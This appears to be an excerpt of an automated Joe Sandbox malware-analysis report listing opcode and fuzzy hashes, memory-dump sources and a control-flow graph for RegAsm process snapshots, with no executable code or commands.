                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                          • Opcode ID: f6cd7305969037a56adf0496a1bd768efe706590cb752f74831355f977b11378
                                                                                                                                                                                                                                          • Instruction ID: 9e7679e929c3605665cb6ec7ab771fd6d33b35ef022d3117c128578d1a1f263b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6cd7305969037a56adf0496a1bd768efe706590cb752f74831355f977b11378
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9921E074E12218DFCB48DFAAE484ADDBBB6FB89310F10906AE515B7320DB305881CF54
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: \V|i
                                                                                                                                                                                                                                          • API String ID: 0-2135609858
                                                                                                                                                                                                                                          • Opcode ID: 9edab9c35f048ae2acd57e5d566c3389b65795127cc20965e988333e395e600b
                                                                                                                                                                                                                                          • Instruction ID: 8a6829535f5744d2668adf5a329c93c59f6813266c28e45047097cfa8472f1a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9edab9c35f048ae2acd57e5d566c3389b65795127cc20965e988333e395e600b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99B19E70E10209CFDF90CFA9E9857DDBBF2BF88304F148529E919A7294EB349945CB91
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q
                                                                                                                                                                                                                                          • API String ID: 0-1007455737
                                                                                                                                                                                                                                          • Opcode ID: c3d4768aa7de7d493cec0b777f359117167acdb4d796d7ec4ec336fc25242254
                                                                                                                                                                                                                                          • Instruction ID: bd1d2eb8aabd74e3b49e43bb6a7128747e3e9efdc298b647c9985a5762521f09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3d4768aa7de7d493cec0b777f359117167acdb4d796d7ec4ec336fc25242254
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86910070E01208CFCB99DFA9D590A9DBBB2FF89301F20916AD51AAB355CB349946CF50
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q
                                                                                                                                                                                                                                          • API String ID: 0-1007455737
                                                                                                                                                                                                                                          • Opcode ID: bf77dd5a0e8f223c276700bad37c3b87190dea76ee2b7d1304c7f5bfbf8ebac4
                                                                                                                                                                                                                                          • Instruction ID: 76c6c5875346d7122e9ea578dabd46b34c3d8fc02993316039f9bcde8f810765
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf77dd5a0e8f223c276700bad37c3b87190dea76ee2b7d1304c7f5bfbf8ebac4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB71D474D11218CFDFA8DFA9D940A9DBBB2BF89300F20942ED419AB354DB359941CF44
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 60efff07dcc92ff88e4fc2065f99ee20dd3187bda3fd3187c13541730d4cc533
                                                                                                                                                                                                                                          • Instruction ID: b46d2b125e5ebe1029fa92e6c0e7c9764601993d0cc55bbf3691ce82f5aece65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60efff07dcc92ff88e4fc2065f99ee20dd3187bda3fd3187c13541730d4cc533
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E42BE74E012298FDBA5DF65C854BEEBBB2BF89300F1081EAD50AA7250DB355E85CF50
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 284ddd2c3cafa75245b4fb2097c19fdf218a34c4a30b84745191a86841fa495f
                                                                                                                                                                                                                                          • Instruction ID: cf323fc44ca6219307f8c7f2481b6b3fa528b730c59a8f4433d2fa58d3ff94cb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 284ddd2c3cafa75245b4fb2097c19fdf218a34c4a30b84745191a86841fa495f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FF18E30A00219AFDB55EF68D940A9EBBF6FF89300F14856AF505AF261DB34ED45CB90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2245123004.0000000008E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_8e70000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e2b2db3c32e8c8e625e3447518f3f118c6d2b85ce3e92a25318476df576d992a
                                                                                                                                                                                                                                          • Instruction ID: 91986d04b5dcc3c97a140e279a34cd0c2df51d4e633ee81d61b865343b2dd2f1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2b2db3c32e8c8e625e3447518f3f118c6d2b85ce3e92a25318476df576d992a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7227B74D01229CFDB65DF69C990BDDBBB2AF49301F1095EAD50AA7250EB309E85CF80
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1534b5c28439b6a3154bb2630fb371eefbbfc1160db9fec493bb7e1fcce77bd1
                                                                                                                                                                                                                                          • Instruction ID: 31ae7b90d0a912958bd2fef939d4c711ae28b314cc8276a1b4e7c472c9f973c0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1534b5c28439b6a3154bb2630fb371eefbbfc1160db9fec493bb7e1fcce77bd1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34E12EB4E00209DFDB88DBE5D954AAEBBB6FF8C200F008429960AB7355DA749C05DF65
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a279ec4da56d661f4633325129d055557f042a6c3e30671f9b87bef19b696411
                                                                                                                                                                                                                                          • Instruction ID: 4ef1e4e60284f12dbf2785150d4dd2991fda0c0ff0344c5d02b9d0357ba79ec5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a279ec4da56d661f4633325129d055557f042a6c3e30671f9b87bef19b696411
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49E11EB4E00209DFDB88DBE5D954AAEBBB6FF8C200F008429960AB7355DE749C05DF65
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a49135382fca0f3bb35d8b58936fe8085633b4765310cd52f98995343e921d6f
                                                                                                                                                                                                                                          • Instruction ID: f1c062f804af602b3e5ddb29c3e102670baaabe9b35e91df5e0225a30b11f4b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a49135382fca0f3bb35d8b58936fe8085633b4765310cd52f98995343e921d6f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F1C474A01229CFDB68DF65C950B9EBBB2FF89300F1081A9C50AA7354DB355E85CF51
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: bfea36956b871461db781c371d6a7c291700d5846c0d90646d0ce4e0613dfc4b
                                                                                                                                                                                                                                          • Instruction ID: bd423a6c4c644bf01d4b931c730196306b1608bba9e9204e9d82d7b54e64f0f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfea36956b871461db781c371d6a7c291700d5846c0d90646d0ce4e0613dfc4b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41E1DF74E01229CFDBA4DFA5C850BAEBBB2FF89300F1081AAC509A7255DB305E85CF51
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4bc05076321ac7028ca5a65a9a69f0d45259ce3aa447f53a87caf832bd569712
                                                                                                                                                                                                                                          • Instruction ID: fe6603b8e79628af6d472ede889f4804c67256f2db2d85844d92ae40c76b26c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bc05076321ac7028ca5a65a9a69f0d45259ce3aa447f53a87caf832bd569712
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48D11774900218CFDB24EFB4D854AADBBB6FF8A301F1081ADD54AAB3A5DB355885CF11
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f2c4bafd888a4e7a94ea0eb633aaec464ca48668deeb395e3c6e2655f8df4961
                                                                                                                                                                                                                                          • Instruction ID: 4f09ef6d80f68dab90d8996d8cc322fe3aa22e2b1efa54e0bb646d011e0e079a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2c4bafd888a4e7a94ea0eb633aaec464ca48668deeb395e3c6e2655f8df4961
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FD1C374E01218CFDBA8DFA5D944B9DBBB2BF49301F2081AAD50AAB354DB316D85CF00
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240533897.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a30000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f7c4988772b41c67503ff1cf9decb9b0377b0ba6497c99f13b54a50539cc879b
                                                                                                                                                                                                                                          • Instruction ID: 0d7211abca398ed552a2363640a81fb79201aa23fb6b638dc499e687c5aa52e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7c4988772b41c67503ff1cf9decb9b0377b0ba6497c99f13b54a50539cc879b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FD1F674900218CFDB28EFB4D854AADBBB6FF8A301F10816DD51AAB2A5DB355885CF11
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c5b602ad490b5112b4adfbd3adcdf83b491405a78956aef7b513917c3e8c88eb
                                                                                                                                                                                                                                          • Instruction ID: 80db9be6e56f5bb37240e29161dbb9aeb24b79df104b03f9be5e1b0ca7edc689
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5b602ad490b5112b4adfbd3adcdf83b491405a78956aef7b513917c3e8c88eb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79D19E74E01218CFDB64DFA9C984B9DBBB2BF89301F1091A9D509AB355DB349E85CF10
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0f5ac2d81063b088c26eeb66c937dcaeab4a7ece96e50a91d85a3ffb34338fc8
                                                                                                                                                                                                                                          • Instruction ID: 74cbbfd63e8fff2feceaa1879846c30e6a6726e1bfe435be09b2dab1c06ae7c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f5ac2d81063b088c26eeb66c937dcaeab4a7ece96e50a91d85a3ffb34338fc8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9C1C374E012298FDBA8DF65C850BDEBBB2BF89300F1081EAC549AB254DB755E85CF50
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 010fb990d8d06c3f5ebebf982855e500a30323948d8999e6c3dd2527355b9be0
                                                                                                                                                                                                                                          • Instruction ID: e870cc355e27fb06a096babcc80ca20ffafb6bd90315ebf23d6f6baaa57a51c2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 010fb990d8d06c3f5ebebf982855e500a30323948d8999e6c3dd2527355b9be0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAB19E70E10209CFDF90CFA9E8817ADBBF2BF88314F148529D919E7254EB749985CB91
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9f5a78ab0d540a529e8d6c0a8d2138808ea154f6ffbd56d028fc38fb19b5eb55
                                                                                                                                                                                                                                          • Instruction ID: de82215f75abb4929204d2ae711b45f2d15a23569de66ec91dfb21d0a9162432
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f5a78ab0d540a529e8d6c0a8d2138808ea154f6ffbd56d028fc38fb19b5eb55
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90B1D274E01228CFDB64DF69C894B9DBBB2FF89304F1085AAD509AB355DB309A85CF50
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 882da89c7b6c8e26ef95ea1a6504f71159e3398535843e248a666728143b972e
                                                                                                                                                                                                                                          • Instruction ID: 094c6c35ba1f9b01f79f0dda43018c8c7977a9b2fe6ce3db449b43cb394945c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 882da89c7b6c8e26ef95ea1a6504f71159e3398535843e248a666728143b972e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFA1F570E00229CFDB65DFA5D850BAEBBB2FF88300F2081A9D50A6B255DB355E85CF51
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240902377.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6cf0000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a6cee39f22dc86da02f6100d309b27c0f1bfe0d03079f009a79d2a14a3229898
                                                                                                                                                                                                                                          • Instruction ID: 7d685fc0ebe7a82f164ebd526efcb747294eab16407fa261a0d63d9a96d9057f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6cee39f22dc86da02f6100d309b27c0f1bfe0d03079f009a79d2a14a3229898
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6391C770D01229CFDBA8DFA5C950B9EBBB2FF89300F5081AAC50AA7254DB354E85DF51

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 304 6a10d80-6a10dcb 309 6a10dd1-6a10dd3 304->309 310 6a10efd-6a10f10 304->310 311 6a10dd6-6a10de5 309->311 314 6a11006-6a11011 310->314 315 6a10f16-6a10f25 310->315 316 6a10deb-6a10e1d 311->316 317 6a10e9d-6a10ea1 311->317 318 6a11019-6a11022 314->318 324 6a10fd1-6a10fd5 315->324 325 6a10f2b-6a10f51 315->325 351 6a10e26-6a10e2d 316->351 352 6a10e1f-6a10e24 316->352 319 6a10eb0 317->319 320 6a10ea3-6a10eae 317->320 322 6a10eb5-6a10eb8 319->322 320->322 322->318 329 6a10ebe-6a10ec2 322->329 327 6a10fe4 324->327 328 6a10fd7-6a10fe2 324->328 353 6a10f53-6a10f58 325->353 354 6a10f5a-6a10f61 325->354 330 6a10fe6-6a10fe8 327->330 328->330 331 6a10ed1 329->331 332 6a10ec4-6a10ecf 329->332 336 6a11039-6a110b5 330->336 337 6a10fea-6a10ff4 330->337 338 6a10ed3-6a10ed5 331->338 332->338 386 6a11189-6a1119c 336->386 387 6a110bb-6a110bd 336->387 349 6a10ff7-6a11000 337->349 339 6a11025-6a11032 338->339 340 6a10edb-6a10ee5 338->340 339->336 355 6a10ee8-6a10ef2 340->355 349->314 349->315 358 6a10e52-6a10e76 351->358 359 6a10e2f-6a10e50 351->359 357 6a10e91-6a10e9b 352->357 360 6a10fc5-6a10fcf 353->360 361 6a10f63-6a10f84 354->361 362 6a10f86-6a10faa 354->362 355->311 363 6a10ef8 355->363 357->355 377 6a10e78-6a10e7e 358->377 378 6a10e8e 358->378 359->357 360->349 361->360 379 6a10fc2 362->379 380 6a10fac-6a10fb2 362->380 363->318 381 6a10e80 377->381 382 6a10e82-6a10e84 377->382 378->357 379->360 383 6a10fb4 380->383 384 6a10fb6-6a10fb8 380->384 381->378 382->378 383->379 384->379 391 6a111a2-6a111b1 386->391 392 6a11234-6a1123f 386->392 388 6a110c0-6a110cf 387->388 393 6a110d1-6a110dd 388->393 394 6a11129-6a1112d 388->394 401 6a111b3-6a111dc 391->401 402 6a111ff-6a11203 391->402 395 6a11247-6a11250 392->395 407 6a110e7-6a110fe 393->407 396 6a1113c 394->396 397 6a1112f-6a1113a 394->397 400 6a11141-6a11144 396->400 397->400 400->395 406 6a1114a-6a1114e 400->406 422 6a111f4-6a111fd 401->422 423 6a111de-6a111e4 401->423 404 6a11212 402->404 405 6a11205-6a11210 402->405 410 6a11214-6a11216 404->410 405->410 408 6a11150-6a1115b 406->408 409 6a1115d 406->409 419 6a11104-6a11106 407->419 412 6a1115f-6a11161 408->412 409->412 414 6a11267-6a112af 410->414 415 6a11218-6a11222 410->415 417 6a11253-6a11260 412->417 418 6a11167-6a11171 412->418 440 6a112b1-6a112b7 414->440 441 6a112c7-6a112e9 414->441 429 6a11225-6a1122e 415->429 417->414 434 6a11174-6a1117e 418->434 425 6a11108-6a1110e 419->425 426 6a1111e-6a11127 419->426 422->429 430 6a111e6 423->430 431 6a111e8-6a111ea 423->431 427 6a11110 425->427 428 6a11112-6a11114 425->428 426->434 427->426 428->426 429->391 429->392 430->422 431->422 434->388 438 6a11184 434->438 438->395 442 6a112b9 440->442 443 6a112bb-6a112bd 440->443 446 6a112ec-6a112f0 441->446 442->441 443->441 447 6a112f2-6a112f7 446->447 448 6a112f9-6a112fe 446->448 449 6a11304-6a11307 447->449 448->449 450 6a114f8-6a11500 449->450 451 6a1130d-6a11322 449->451 451->446 453 6a11324 451->453 454 6a113e0-6a11405 453->454 455 6a11498 453->455 456 6a1132b-6a11350 453->456 466 6a11407-6a11409 454->466 467 6a1140b-6a1140f 454->467 459 6a114a2-6a114b9 455->459 468 6a11352-6a11354 456->468 469 6a11356-6a1135a 456->469 460 6a114bf-6a114f3 459->460 460->446 471 6a1146d-6a11493 466->471 472 6a11411-6a1142e 467->472 473 6a11430-6a11453 467->473 474 6a113b8-6a113db 468->474 475 6a1137b-6a1139e 469->475 476 6a1135c-6a11379 469->476 471->446 472->471 490 6a11455-6a1145b 473->490 491 6a1146b 473->491 474->446 492 6a113a0-6a113a6 475->492 493 6a113b6 475->493 476->474 494 6a1145d 490->494 495 6a1145f-6a11461 490->495 491->471 496 6a113a8 492->496 497 6a113aa-6a113ac 492->497 493->474 494->491 495->491 496->493 497->493
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2240491697.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6a10000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                                                                                                                          • API String ID: 0-2551331179
                                                                                                                                                                                                                                          • Opcode ID: 9575eaf79da34a88ebed277333dea207a96645f6d3fff9bccdc2d5c7e1674943
                                                                                                                                                                                                                                          • Instruction ID: f824027caa8a8fb4889d2a5aecc76a0dd854365a690ad9230d202411a85f3ace
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9575eaf79da34a88ebed277333dea207a96645f6d3fff9bccdc2d5c7e1674943
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB22AF30B042059FDB949F69C984A7EBBF6BF89600B10846AE516DF3A2CF74DC41CB91

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
